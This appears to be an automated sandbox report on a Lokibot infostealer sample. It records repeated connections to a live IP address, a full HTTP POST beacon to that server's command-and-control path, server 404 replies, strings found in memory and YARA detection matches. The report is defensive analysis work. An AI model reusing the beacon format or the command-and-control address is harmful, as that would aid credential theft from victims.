Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41

Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe

Code function: 12_2_00404ED4 recv,

12_2_00404ED4

Source: unknown

HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 180Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:52:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:53:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:54:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 28 Nov 2024 12:54:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: FVR-N2411-07396.exe, 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, ZeJFfrYmOnJKS.exe, 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ZeJFfrYmOnJKS.exe, ZeJFfrYmOnJKS.exe, 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
